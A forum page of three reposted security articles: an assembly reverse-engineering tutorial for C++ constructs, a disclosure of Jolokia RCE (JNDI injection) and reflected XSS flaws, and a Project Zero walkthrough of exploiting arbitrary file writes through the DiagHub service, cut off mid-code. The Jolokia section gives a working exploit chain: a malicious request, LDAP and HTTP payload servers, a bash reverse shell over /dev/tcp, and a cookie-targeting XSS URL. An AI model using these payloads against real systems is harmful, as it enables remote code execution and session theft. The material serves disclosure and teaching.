Everything posted by Nytro
Daniel A. Bloom

Daniel Bloom is a young, self-taught entrepreneur and the Founder of Bloom Cyber Defense, LLC — http://bcdefense.com — Twitter: @bcdannyboy

Apr 17

BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)

Reverse Engineering

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I'm a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy-to-comprehend information all in one place. This "BOLO: Reverse Engineering" series is exactly that! Throughout this article series I will be showing you things to Be On the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you're seeing and why things look the way they look. Furthermore, this article series will not cover the basics of assembly; it will only present patterns and decompiled code so that you can get a general understanding of what to look for / how to interpret assembly code.

Throughout this article we will cover:

Variable Initiation
Basic Output
Mathematical Operations
Functions
Loops (For loop / While loop)
Conditional Statements (IF Statement / Switch Statement)
User Input

Please note: this tutorial was made with Visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.
Variable Initiation

Variables are extremely important when programming. Here we can see a few important variables:

a string
an int
a boolean
a char
a double
a float
a char array

Basic Variables

Please note: in C++, 'string' is not a primitive type, but I thought it important to show you anyway.

Now, let's take a look at the assembly:

Initiating Variables

Here we can see how IDA represents space allocation for variables. As you can see, we're allocating space for each variable before we actually initialize them.

Initializing Variables

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

C++ String Initiation

As you can see, initiating a string requires a call to a built-in initialization function.

Basic Output

Preface info: throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article. Although this tutorial was built in Visual C++, I opted to use printf rather than cout for output.

Basic Output

Now, let's take a look at the assembly. First, the string literal:

String Literal Output

As you can see, the string literal is pushed onto the stack to be used as a parameter for the printf function. Now, let's take a look at one of the variable outputs:

Variable Output

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the "%i" string literal used to indicate integer output. These values are then taken from the stack and used as parameters when calling the printf function.
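For readers following along without the screenshots, the source behind this section might look roughly like the following. This is a sketch, not the article's actual code: the variable name intvar echoes the article, but the other names, values, and strings are mine.

```cpp
#include <cstdio>
#include <string>

// Each local below gets stack space in the function prologue; a mov (or,
// for the string, a call into basic_string's initializer) then fills it.
int demo_variables_and_output() {
    std::string strvar = "a string";  // not primitive: initialized via a function call
    int intvar = 10;                  // e.g. mov [ebp+intvar], 0Ah
    bool boolvar = true;
    char charvar = 'c';
    double doublevar = 1.5;
    float floatvar = 1.5f;
    char chararray[] = "array";       // copied into the array's stack space

    // String literal: push offset <literal>; call printf
    std::printf("Hello!\n");
    // Variable output: mov eax, [ebp+intvar]; push eax; push offset "%i"; call printf
    std::printf("%i\n", intvar);
    // Use the remaining locals so the sketch compiles cleanly
    std::printf("%s %c %f %f %s %d\n", strvar.c_str(), charvar, doublevar,
                (double)floatvar, chararray, (int)boolvar);
    return intvar;
}
```

Compiled as unoptimized 32-bit Visual C++, each local typically gets an [ebp+offset] slot and each printf argument is pushed right to left, which is consistent with the patterns described above.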
Mathematical Functions

In this section, we'll be going over the following mathematical functions:

Addition
Subtraction
Multiplication
Division
Bitwise AND
Bitwise OR
Bitwise XOR
Bitwise NOT
Bitwise Right-Shift
Bitwise Left-Shift

Mathematical Functions Code

Let's break each function down into assembly. First, we set A to hex 0A, which represents decimal 10, and B to hex 0F, which represents decimal 15.

Variable Setting

We add by using the 'add' opcode:

Addition

We subtract using the 'sub' opcode:

Subtraction

We multiply using the 'imul' opcode:

Multiplication

We divide using the 'idiv' opcode. In this case, we also use 'cdq' first, which sign-extends EAX into EDX so that the dividend fills the EDX:EAX register pair that the division operation expects.

Division

We perform the Bitwise AND using the 'and' opcode:

Bitwise AND

We perform the Bitwise OR using the 'or' opcode:

Bitwise OR

We perform the Bitwise XOR using the 'xor' opcode:

Bitwise XOR

We perform the Bitwise NOT using the 'not' opcode:

Bitwise NOT

We perform the Bitwise Right-Shift using the 'sar' opcode:

Bitwise Right-Shift

We perform the Bitwise Left-Shift using the 'shl' opcode:

Bitwise Left-Shift

Function Calls

In this section, we'll be looking at 3 different types of functions:

a basic void function
a function that returns an integer
a function that takes in parameters

Calling Functions

First, let's take a look at calling newfunc() and newfuncret(), because neither of those actually takes in any parameters.

Calling Functions Without Parameters

If we follow the call to the newfunc() function, we can see that all it really does is print out "Hello! I'm a new function!":

The newfunc() Function Code

The newfunc() Function

As you can see, this function does use the retn opcode, but only to return back to the previous location (so that the program can continue after the function completes). Now, let's take a look at the newfuncret() function, which generates a random integer using the C++ rand() function and then returns said integer.
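As a source-level companion to the math section and the three functions just introduced, here is a sketch. The names newfunc, newfuncret, and funcparams follow the article; the bodies, the out-array layout, and the printed strings are my own:

```cpp
#include <cstdio>
#include <cstdlib>
#include <string>

// Mirrors the math section: A = 0x0A (10), B = 0x0F (15).
// Each operator maps to the opcode named above; results land in out[0..9].
int math_ops(int A, int B, int* out) {
    out[0] = A + B;   // add
    out[1] = A - B;   // sub
    out[2] = A * B;   // imul
    out[3] = B / A;   // cdq + idiv
    out[4] = A & B;   // and
    out[5] = A | B;   // or
    out[6] = A ^ B;   // xor
    out[7] = ~A;      // not
    out[8] = A >> 1;  // sar
    out[9] = A << 1;  // shl
    return out[0];
}

// A basic void function: call ... retn, nothing else.
void newfunc() {
    std::printf("Hello! I'm a new function!\n");
}

// Returns via EAX: rand()'s result is stored to A, then A is moved
// back into EAX as the return value.
int newfuncret() {
    int A = std::rand();
    return A;
}

// Parameters are pushed onto the stack by the caller before `call`.
void funcparams(std::string str, int i, char c) {
    std::printf("%s %i %c\n", str.c_str(), i, c);
}
```

With A = 10 and B = 15 this gives 25, -5, 150, 1, 10, 15, 5, -11, 5, and 20 respectively, which you can use to sanity-check the assembly you're reading.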
The newfuncret() Function Code

The newfuncret() Function

First, space is allocated for the A variable. Then, the rand() function is called, which returns a value in the EAX register. Next, the value in EAX is moved into the A variable's space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call functions and what it looks like when a function returns something, let's talk about calling functions with parameters. First, let's take another look at the call statement:

Calling a Function with Parameters in C++

Calling a Function with Parameters

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First, you move the variable into a register, then you push the register onto the stack, then you call the function. Let's take a look at the function's code:

The funcparams() Function Code

The funcparams() Function

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy peasy.

Loops

Now that we have function calling, output, variables, and math down, let's move on to flow control. First, we'll start with a for loop:

For Loop Code

A Graphical Overview of the For Loop

Before we break down the assembly code into smaller sections, let's take a look at the general layout. As you can see, when the for loop starts, it has 2 options: it can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

Detailed For Loop

First, we check if we've hit the maximum value by comparing the i variable to the max variable.
If the i variable is not greater than or equal to the max variable, we continue down to the left, print out the i variable, then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.

Now, let's take a look at a while loop:

While Loop Code

While Loop

In this loop, all we're doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print "I'm out!"; otherwise, we continue to loop. In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A, which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A, and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out "I'm out!" and then return.

If Statements

Next, we'll be talking about if statements. First, let's take a look at the code:

IF Statement Code

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out "greater than 15". If A is less than 15 but greater than 10, the program will print out "less than 15, greater than 10". This pattern will continue until A is less than 5, in which case the program will print out "less than 5".

Now, let's take a look at the assembly graph:

IF Statement Assembly Graph

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply "If X Then Y Else Z". If we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out "greater than 15" and then return. Otherwise, the program will compare A to hex 0A, which represents decimal 10.
This pattern will continue until the program prints and returns.

Switch Statements

Switch statements are a lot like IF statements, except in a Switch statement one variable or statement is compared to a number of 'cases' (or possible equivalences). Let's take a look at our code:

Switch Statement Code

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. If A is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.

Now, let's take a look at the assembly graph:

Switch Case Assembly Graph

Unlike IF statements, switch statements do not follow the "If X Then Y Else Z" rule; instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement's equivalent. Let's first take a look at the initial 2 boxes:

The First 2 Graph Sections

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case's section: in the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out "5" and then jump to the return section.

User Input

In this section, we'll cover user input using the C++ cin function. First, let's look at the code:

User Input Code

In this function, we simply take in a string to the variable sentence using the C++ cin function, and then we print out sentence through a printf statement. Let's break this down into assembly.
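Before diving into the assembly, here is a source-level sketch of the control-flow constructs and the user-input function discussed above. The variable name sentence follows the article; the loop bounds, thresholds, and case values are illustrative, not the article's exact code:

```cpp
#include <cstdio>
#include <cstdlib>
#include <iostream>
#include <string>

// For loop: cmp i, max / jge exit; body runs, then inc and jmp back.
int count_to(int max) {
    int printed = 0;
    for (int i = 0; i < max; i++) {
        printed++;  // stands in for the printf of i
    }
    return printed;
}

// While loop: keep drawing rand() % 20 until the value is greater than 10.
int loop_until_out() {
    int A = 0;
    while (A <= 10) {          // cmp against 0Ah, loop back on failure
        A = std::rand() % 20;  // new random number each iteration
    }
    std::printf("I'm out!\n");
    return A;
}

// If/else-if chain: each cmp either falls through to its print
// or jumps on to the next comparison.
const char* classify(int A) {
    if (A > 15) return "greater than 15";
    if (A > 10) return "less than 15, greater than 10";
    if (A > 5)  return "less than 10, greater than 5";
    return "less than 5";
}

// Switch: a temporary copy of A is range-checked, then used to jump
// directly to the matching case's code.
const char* pick_case(int A) {
    switch (A) {
        case 3:  return "3";
        case 5:  return "5";
        case 7:  return "7";
        default: return "default";
    }
}

// cin: the string is constructed, then the extraction operator is called
// with the stream and the string as its arguments; printf echoes it back.
void user_input() {
    std::string sentence;
    std::cin >> sentence;
    std::printf("%s\n", sentence.c_str());
}
```

With optimizations off, each construct typically compiles to the cmp/jcc patterns walked through above; the switch additionally emits a bounds check before indexing its jump table.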
First, the C++ cin part:

C++ cin

This code simply initializes the string sentence, then calls the cin function and sets the input to the sentence variable. Let's take a look at the cin call a bit closer:

The C++ cin Function Up Close

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function, which is then called and has its output moved into ECX, which is then put on the stack for the printf statement:

User Input printf Statement

Thanks! Hopefully, this article gave you a decent understanding of how basic programming concepts are represented in assembly. Keep an eye out for the next part of this series, BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)!

lea eax, [ebp+Reading]  ; "Reading"
push eax
lea ecx, [ebp+For]      ; "For"
push ecx
mov edx, [ebp+Thanks]   ; "Thanks"
push edx
push offset _Format     ; "%s %s %s"
call j_printf

Sursa: https://medium.com/@danielabloom/bolo-reverse-engineering-part-1-basic-programming-concepts-f88b233c63b7
Jolokia Vulnerabilities - RCE & XSS

Wednesday, April 18, 2018 at 12:45PM

Recently, during a client engagement, Gotham Digital Science found a couple of zero-day vulnerabilities in the Jolokia service. Jolokia is an open source product that provides an HTTP API interface for JMX (Java Management Extensions) technology. It contains an API we can use for calling MBeans registered on the server and reading/writing their properties. JMX technology is used for managing and monitoring devices, applications, and service-driven networks.

The following issues are described below:

Remote Code Execution via JNDI Injection – CVE-2018-1000130
Cross-Site Scripting – CVE-2018-1000129

Affected versions: 1.4.0 and below. Version 1.5.0 addresses both issues.

Before we start, a little humour - if someone thinks that the documentation is useless for bug hunters, look at this:

Remote Code Execution via JNDI Injection

CVE-2018-1000130

The Jolokia service has a proxy mode that was vulnerable to JNDI injection by default before version 1.5.0. When the Jolokia agent is deployed in proxy mode, an external attacker with access to the Jolokia web endpoint can execute arbitrary code remotely via a JNDI injection attack. This attack is possible because the Jolokia library initiates LDAP/RMI connections using user-supplied input. JNDI attacks were explained at the BlackHat USA 2016 conference by HP Enterprise folks, and they showed some useful vectors we can use to turn them into Remote Code Execution.

If a third-party system uses the Jolokia service in proxy mode, this system is exposed to remote code execution through the Jolokia endpoint. Jolokia, as a component, does not provide any authentication mechanisms for this endpoint to protect the server from an arbitrary attacker, but this is strongly recommended in the documentation.

Steps to reproduce:

For demonstration purposes we'll run all of the components in the exploit chain on the loopback interface.
The following POST request can be used to exploit this vulnerability:

POST /jolokia/ HTTP/1.1
Host: localhost:10007
Content-Type: application/x-www-form-urlencoded
Content-Length: 206

{
    "type" : "read",
    "mbean" : "java.lang:type=Memory",
    "target" : {
        "url" : "service:jmx:rmi:///jndi/ldap://localhost:9092/jmxrmi"
    }
}

We need to create LDAP and HTTP servers in order to serve a malicious payload. These code snippets were originally taken from the marshalsec and zerothoughts GitHub repositories.

LDAPRefServer.java:

public class LDAPRefServer {

    private static final String LDAP_BASE = "dc=example,dc=com";

    public static void main(String[] args) {
        int port = 1389;
        // Create LDAP Server and HTTP Server
        if (args.length < 1 || args[0].indexOf('#') < 0) {
            System.err.println(LDAPRefServer.class.getSimpleName() + " <codebase_url#classname> [<port>]");
            System.exit(-1);
        } else if (args.length > 1) {
            port = Integer.parseInt(args[1]);
        }
        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                "listen", InetAddress.getByName("0.0.0.0"), port,
                ServerSocketFactory.getDefault(), SocketFactory.getDefault(),
                (SSLSocketFactory) SSLSocketFactory.getDefault()));
            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[0])));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port);
            ds.startListening();
            System.out.println("Starting HTTP server");
            HttpServer httpServer = HttpServer.create(new InetSocketAddress(7873), 0);
            httpServer.createContext("/", new HttpFileHandler());
            httpServer.setExecutor(null);
            httpServer.start();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;

        public OperationInterceptor(URL cb) {
            this.codebase = cb;
        }

        @Override
        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            } catch (Exception e1) {
                e1.printStackTrace();
            }
        }

        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e)
                throws LDAPException, MalformedURLException {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "ExportObject");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if (refPos > 0) {
                cbstring = cbstring.substring(0, refPos);
            }
            System.out.println("javaCodeBase: " + cbstring);
            e.addAttribute("javaCodeBase", cbstring);
            e.addAttribute("objectClass", "javaNamingReference");
            e.addAttribute("javaFactory", this.codebase.getRef());
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }
    }
}

HttpFileHandler.java:

public class HttpFileHandler implements HttpHandler {

    public void handle(HttpExchange httpExchange) {
        try {
            System.out.println("new http request from " + httpExchange.getRemoteAddress() + " " + httpExchange.getRequestURI());
            InputStream inputStream = HttpFileHandler.class.getResourceAsStream("ExportObject.class");
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            while (inputStream.available() > 0) {
                byteArrayOutputStream.write(inputStream.read());
            }
            byte[] bytes = byteArrayOutputStream.toByteArray();
            httpExchange.sendResponseHeaders(200, bytes.length);
            httpExchange.getResponseBody().write(bytes);
            httpExchange.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

After that we need to create an ExportObject.java with a reverse shell command. The bytecode of this class will be served from our HTTP server:

public class ExportObject {

    public ExportObject() {
        try {
            System.setSecurityManager(null);
            java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp/127.0.0.1/7777 0>&1`");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

The LDAP server should be run with the following command line arguments:

http://127.0.0.1:7873/#ExportObject 9092

where:

http://127.0.0.1:7873/ is the URL of the attacker's HTTP server
ExportObject is the name of the Java class containing the attacker's code
9092 is the LDAP server listen port

Start an nc listener on port 7777:

$ nc -lv 7777

After the request shown in step #1 is sent, the vulnerable server makes a request to the attacker's LDAP server. When the LDAP server, listening on port 9092, receives a request from the vulnerable server, it creates an Entry object with attributes and returns it in the LDAP response:

e.addAttribute("javaClassName", "ExportObject");
e.addAttribute("javaCodeBase", "http://127.0.0.1/");
e.addAttribute("objectClass", "javaNamingReference");
e.addAttribute("javaFactory", "ExportObject");

When the vulnerable server receives the LDAP response, it fetches the ExportObject.class from the attacker's HTTP server, instantiates the object and executes the reverse shell command. The attacker receives the connection back from the vulnerable server on his nc listener.

Cross-Site Scripting

CVE-2018-1000129

The Jolokia web application is vulnerable to a classic Reflected Cross-Site Scripting (XSS) attack. By default, Jolokia returns responses with the application/json content type, so for most cases inserting user-supplied input into the response is not a big problem.
But it was discovered from reading the source code that it is possible to modify the Content-Type of a response just by adding a GET parameter mimeType to the request:

http://localhost:8161/api/jolokia/read?mimeType=text/html

After that, it was relatively easy to find at least one occurrence where URL parameters are inserted in the response 'as is':

http://localhost:8161/api/jolokia/read<svg%20onload=alert(document.cookie)>?mimeType=text/html

With a text/html Content-Type, the classic reflected XSS attack is possible. Exploiting this issue allows an attacker to supply arbitrary client-side JavaScript code within application input parameters that will ultimately be rendered and executed within the end user's web browser. This can be leveraged to steal cookies in the vulnerable domain and potentially gain unauthorised access to a user's authenticated session, alter the content of the vulnerable web page, or compromise the user's web browser.

And at the end, advice for bug hunters: read the documentation! Sometimes it's useful! Recommendation for Jolokia users: update the service to version 1.5.0.

Credits

Many thanks to Roland Huss from the Jolokia project for working diligently with GDS to mitigate these issues.

Olga Barinova

Sursa: https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege

Posted by James Forshaw, Project Zero

Previously I presented a technique to exploit arbitrary directory creation vulnerabilities on Windows to give you read access to any file on the system. In the upcoming Spring Creators Update (RS4) the abuse of mount points to link to files as I exploited in the previous blog post has been remediated. This is an example of a long term security benefit from detailing how vulnerabilities might be exploited, giving a developer an incentive to find ways of mitigating the exploitation vector.

Keeping with that spirit, in this blog post I'll introduce a novel technique to exploit the more common case of arbitrary file writes on Windows 10. Perhaps once again Microsoft might be able to harden the OS to make it more difficult to exploit these types of vulnerabilities. I'll demonstrate exploitation by describing in detail the recently fixed issue that Project Zero reported to Microsoft (issue 1428).

An arbitrary file write vulnerability is where a user can create or modify a file in a location they could not normally access. This might be due to a privileged service incorrectly sanitizing information passed by the user, or due to a symbolic link planting attack where the user can write a link into a location which is subsequently used by the privileged service. The ideal vulnerability is one where the attacking user not only controls the location of the file being written but also the entire contents. This is the type of vulnerability we'll consider in this blog post.

A common way of exploiting arbitrary file writes is to perform DLL hijacking. When a Windows executable begins executing, the initial loader in NTDLL will attempt to find all imported DLLs.
The locations that the loader checks for imported DLLs are more complex than you'd expect, but for our purposes can be summarized as follows:

1. Check Known DLLs, which is a pre-cached list of DLLs which are known to the OS. If found, the DLL is mapped into memory from a pre-loaded section object.
2. Check the application's directory; for example, if importing TEST.DLL and the application is in C:\APP then it will check C:\APP\TEST.DLL.
3. Check the system locations, such as C:\WINDOWS\SYSTEM32 and C:\WINDOWS.
4. If all else fails, search the current environment PATH.

The aim of the DLL hijack is to find an executable which runs at a high privilege which will load a DLL from a location that the vulnerability allows us to write to. The hijack only succeeds if the DLL hasn't already been found in a location checked earlier.

There are two problems which make DLL hijacking annoying:

1. You typically need to create a new instance of a privileged process, as the majority of DLL imports are resolved when the process is first executed.
2. Most system binaries, executables and DLLs that will run as a privileged user will be installed into SYSTEM32.

The second problem means that in steps 2 and 3 the loader will always look for DLLs in SYSTEM32. Assuming that overwriting a DLL isn't likely to be an option (at the least if the DLL is already loaded you can't write to the file), that makes it harder to find a suitable DLL to hijack. A typical way around these problems is to pick an executable that is not located in SYSTEM32 and which can be easily activated, such as by loading a COM server or running a scheduled task.

Even if you find a suitable target executable to DLL hijack, the implementation can be quite ugly. Sometimes you need to implement stub exports for the original DLL, otherwise the loading of the DLL will fail. In other cases the best place to run code is during DllMain, which introduces other problems such as running code inside the loader lock.
What would be nice is a privileged service that will just load an arbitrary DLL for us: no hijacking, no needing to spawn the "correct" privileged process. The question is, does such a service exist?

It turns out yes, one does, and the service itself has been abused at least twice previously, once by Lokihardt for a sandbox escape, and once by me for user to system EoP. This service goes by the name "Microsoft (R) Diagnostics Hub Standard Collector Service," but we'll call it DiagHub for short.

The DiagHub service was introduced in Windows 10, although there's a service that performs a similar task called IE ETW Collector in Windows 7 and 8.1. The purpose of the service is to collect diagnostic information using Event Tracing for Windows (ETW) on behalf of sandboxed applications, specifically Edge and Internet Explorer. One of its interesting features is that it can be configured to load an arbitrary DLL from the SYSTEM32 directory, which is the exact feature that Lokihardt and I exploited to gain elevated privileges. All the functionality for the service is exposed over a registered DCOM object, so in order to load our DLL we'll need to work out how to call methods on that DCOM object. At this point you can skip to the end, but if you want to understand how I would go about finding how the DCOM object is implemented, the next section might be of interest.

Reverse Engineering a DCOM Object

Let's go through the steps I would take to try and find what interfaces an unknown DCOM object supports and find the implementation so we can reverse engineer them. There are two approaches I will typically take: go straight for RE in IDA Pro or similar, or do some on-system inspection first to narrow down the areas we have to investigate. Here we'll go for the second approach as it's more informative. I can't say how Lokihardt found his issue; I'm going to opt for magic.
For this approach we'll need some tools, specifically my OleViewDotNet v1.4+ (OVDN) tool from github as well as an installation of WinDBG from the SDK. The first step is to find the registration information for the DCOM object and discover what interfaces are accessible. We know that the DCOM object is hosted in a service, so once you've loaded OVDN go to the menu Registry ⇒ Local Services and the tool will load a list of registered system services which expose COM objects. If you now find the "Microsoft (R) Diagnostics Hub Standard Collector Service" service (applying a filter here is helpful) you should find the entry in the list. If you open the service tree node you'll see a child, "Diagnostics Hub Standard Collector Service," which is the hosted DCOM object. If you open that tree node the tool will create the object, then query for all remotely accessible COM interfaces to give you a list of interfaces the object supports. I've shown this in the screenshot below:

While we're here it's useful to inspect what security is required to access the DCOM object. If you right click the class treenode you can select View Access Permissions or View Launch Permissions and you'll get a window that shows the permissions. In this case it shows that this DCOM object will be accessible from IE Protected Mode as well as Edge's AppContainer sandbox, including LPAC.

Of the list of interfaces shown we only really care about the standard interfaces. Sometimes there are interesting interfaces in the factory but in this case there aren't. Of these standard interfaces there are two we care about, the IStandardCollectorAuthorizationService and IStandardCollectorService. Just to cheat slightly, I already know that it's the IStandardCollectorService service we're interested in, but as the following process is going to be the same for each of the interfaces it doesn't matter which one we pick first.
If you right click the interface treenode and select Properties you can see a bit of information about the registered interface. There's not much more information that will help us here, other than we can see there are 8 methods on this interface. As with a lot of COM registration information, this value might be missing or erroneous, but in this case we'll assume it's correct. To understand what the methods are we'll need to track down the implementation of IStandardCollectorService inside the COM server. This knowledge will allow us to target our RE efforts to the correct binary and the correct methods.

Doing this for an in-process COM object is relatively easy as we can query for an object's VTable pointer directly by dereferencing a few pointers. However, for out-of-process it's more involved. This is because the actual in-process object you'd call is really a proxy for the remote object, as shown in the following diagram:

All is not lost, however; we can still find the VTable of the OOP object by extracting the information stored about the object in the server process. Start by right clicking the "Diagnostics Hub Standard Collector Service" object tree node and select Create Instance. This will create a new instance of the COM object as shown below:

The instance gives you basic information such as the CLSID for the object which we'll need later (in this case {42CBFAA7-A4A7-47BB-B422-BD10E9D02700}) as well as the list of supported interfaces. Now we need to ensure we have a connection to the interface we're interested in. For that select the IStandardCollectorService interface in the lower list, then in the Operations menu at the bottom select Marshal ⇒ View Properties. If successful you'll now see the following new view:

There's a lot of information in this view but the two pieces of most interest are the Process ID of the hosting service and the Interface Pointer Identifier (IPID).
In this case the Process ID should be obvious as the service is running in its own process, but this isn't always the case—sometimes when you create a COM object you've no idea which process is actually hosting the COM server, so this information is invaluable. The IPID is the unique identifier in the hosting process for the server end of the DCOM object; we can use the Process ID and the IPID in combination to find this server and from that find out the location of the actual VTable implementing the COM methods. It's worth noting that the maximum Process ID size from the IPID is 16 bits; however, modern versions of Windows can have much larger PIDs so there's a chance that you'll have to find the process manually or restart the service multiple times until you get a suitable PID.

Now we'll use a feature of OVDN which allows us to reach into the memory of the server process and find the IPID information. You can access information about all processes through the main menu Object ⇒ Processes, but as we know which process we're interested in, just click the View button next to the Process ID in the marshal view. You do need to be running OVDN as an administrator, otherwise you'll not be able to open the service process. If you've not done so already the tool will ask you to configure symbol support as OVDN needs public symbols to find the correct locations in the COM DLLs to parse. You'll want to use the version of DBGHELP.DLL which comes with WinDBG as that supports remote symbol servers. Configure the symbols similar to the following dialog:

If everything is correctly configured and you're an administrator you should now see more details about the IPID, as shown below:

The two most useful pieces of information here are the Interface pointer, which is the location of the heap allocated object (in case you want to inspect its state), and the VTable pointer for the interface.
The VTable address gives us information for where exactly the COM server implementation is located. As we can see here the VTable is located in a different module (DiagnosticsHub.StandardCollector.Runtime) from the main executable (DiagnosticsHub.StandardCollector.Server). We can verify the VTable address is correct by attaching to the service process using WinDBG and dumping the symbols at the VTable address. We also know from before that we’re expecting 8 methods, so we can take that into account by using the command:

dqs DiagnosticsHub_StandardCollector_Runtime+0x36C78 L8

Note that WinDBG converts periods in a module name to underscores. If successful you’ll see something similar to the following screenshot: Extracting out that information we now get the names of the methods (shown below) as well as their addresses in the binary. We could set breakpoints and see what gets called during normal operation, or take this information and start the RE process.

ATL::CComObject<StandardCollectorService>::QueryInterface
ATL::CComObjectCached<StandardCollectorService>::AddRef
ATL::CComObjectCached<StandardCollectorService>::Release
StandardCollectorService::CreateSession
StandardCollectorService::GetSession
StandardCollectorService::DestroySession
StandardCollectorService::DestroySessionAsync
StandardCollectorService::AddLifetimeMonitorProcessIdForSession

The list of methods looks correct: they start with the 3 standard methods for a COM object, which in this case are implemented by the ATL library. Following those methods are five implemented by the StandardCollectorService class. Being public symbols, this doesn’t tell us what parameters we expect to pass to the COM server. Due to C++ names containing some type information, IDA Pro might be able to extract that information for you; however, that won’t necessarily tell you the format of any structures which might be passed to the function. 
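The 0x36C78 in the command above is simply the VTable address minus the module base, and the L8 is the expected method count. A sketch of how that command string is derived (the absolute addresses below are invented for illustration):

```python
def windbg_dqs(module_name, vtable_addr, module_base, method_count):
    """Build the WinDBG 'dqs' command for a module-relative vtable dump.

    WinDBG converts periods in module names to underscores.
    """
    offset = vtable_addr - module_base
    return "dqs {}+0x{:X} L{}".format(
        module_name.replace(".", "_"), offset, method_count)

cmd = windbg_dqs("DiagnosticsHub.StandardCollector.Runtime",
                 0x7FF8C0036C78, 0x7FF8C0000000, 8)
```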
Fortunately due to how COM proxies are implemented using the Network Data Representation (NDR) interpreter to perform marshalling, it’s possible to reverse the NDR bytecode back into a format we can understand. In this case go back to the original service information, right click the IStandardCollectorService treenode and select View Proxy Definition. This will get OVDN to parse the NDR proxy information and display a new view as shown below. Viewing the proxy definition will also parse out any other interfaces which that proxy library implements. This is likely to be useful for further RE work. The decompiled proxy definition is shown in a C# like pseudo code but it should be easy to convert into working C# or C++ as necessary. Notice that the proxy definition doesn’t contain the names of the methods but we’ve already extracted those out. So applying a bit of cleanup and the method names we get a definition which looks like the following:

[uuid("0d8af6b7-efd5-4f6d-a834-314740ab8caa")]
struct IStandardCollectorService : IUnknown {
    HRESULT CreateSession(_In_ struct Struct_24* p0,
                          _In_ IStandardCollectorClientDelegate* p1,
                          _Out_ ICollectionSession** p2);
    HRESULT GetSession(_In_ GUID* p0, _Out_ ICollectionSession** p1);
    HRESULT DestroySession(_In_ GUID* p0);
    HRESULT DestroySessionAsync(_In_ GUID* p0);
    HRESULT AddLifetimeMonitorProcessIdForSession(_In_ GUID* p0, [In] int p1);
}

There’s one last piece missing; we don’t know the definition of the Struct_24 structure. It’s possible to extract this from the RE process but fortunately in this case we don’t have to. The NDR bytecode must know how to marshal this structure across so OVDN just extracts the structure definition out for us automatically: select the Structures tab and find Struct_24. As you go through the RE process you can repeat this process as necessary until you understand how everything works. Now let’s get to actually exploiting the DiagHub service and demonstrating its use with a real world exploit. 
Example Exploit

So after our efforts of reverse engineering, we’ll discover that in order to load a DLL from SYSTEM32 we need to do the following steps:

Create a new Diagnostics Session using IStandardCollectorService::CreateSession.
Call the ICollectionSession::AddAgent method on the new session, passing the name of the DLL to load (without any path information).

The simplified loading code for ICollectionSession::AddAgent is as follows:

void EtwCollectionSession::AddAgent(LPCWSTR dll_path, REFGUID guid) {
    WCHAR valid_path[MAX_PATH];
    if (!GetValidAgentPath(dll_path, valid_path)) {
        return E_INVALID_AGENT_PATH;
    }
    HMODULE mod = LoadLibraryExW(valid_path, nullptr,
